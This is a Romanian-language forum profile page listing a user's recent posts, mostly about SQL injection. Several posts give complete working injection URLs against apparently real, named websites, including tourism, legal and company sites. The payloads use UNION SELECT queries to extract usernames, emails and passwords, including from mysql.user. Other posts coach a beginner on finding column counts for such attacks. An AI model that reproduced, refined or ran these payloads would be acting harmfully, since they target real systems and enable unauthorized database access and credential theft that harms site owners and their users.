Jump to content

redking

Active Members
  • Posts

    50
  • Joined

  • Last visited

  • Days Won

    1

redking last won the day on February 10 2009

redking had the most liked content!

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

redking's Achievements

Newbie

Newbie (1/14)

12

Reputation

  1. pffff....si de cate ori l-am intrebat!
  2. redking

    Some SQLi

    pune ma si tu adresa completa....cine draq crezi ca te ajuta asa?....un sqli poate fi destul de diversificat...is multe detalii de care trebuie tinut cont
  3. poti face foarte multe incercari pe un sql vulnerabil....am gasit multe diferente in abordarea interogarilor....oricum...ma bucur ca ai rezolvat problema....
  4. inseamna ca nu ai gasit numaru corect al coloanelor....decat sa incerci cu order by....mai bine incearca "union+all+select+1,2,3,...." tot adaugi pana cand vei vedea ca nu-ti mai da eroarea de genu "the selected statement....."...iti afiseaza altceva....daca nu intelegi da-mi un pm cu id-u tau...si te ajut....
  5. http://www.saints.co.nz/players.php?id=1+and+substring(@@version,1,1)=4 ....am facut multe incercari de a gasi tabelu` cu userii dar degeaba....
  6. cu ce mi-am batut capu` ----> materia prima: http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+information_schema.columns+where+table_schema=0x6170746c75636361+and+table_name=0x7574656e7469 si produsul finit: http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(email,0x3a,password))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+utenti
  7. da paxnWo stiu treaba asta....dar nu stiu sa extrag manual tabelele din information_schema... L.E.:m-am documentat si am invatzat cum se extrag manual datele din information_schema...mai dura e faza daca apar magic_quotes-urile...
  8. cum ai ghicit numele tabelelor? cu ceva program nu?
  9. daca pui pe cineva sa faca o interogare din browser.....pauza....
  10. http://www.physikinstrumente.com/en/news/fullnews.php?newsid=1+union+all+select+1,2,3,concat(username,0x3a,password),5,6,7+from+user
  11. http://www.e-juridic.ro/index.php?pag=show_prod&pid=1+union+all+select+1,concat(userid,0x3a,id,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+user
  12. care a fost site-ul cu cel mai mare numar de coloane pe care l-ati prins?shi cate?
  13. http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user
  14. ce program folosesti?
×
×
  • Create New...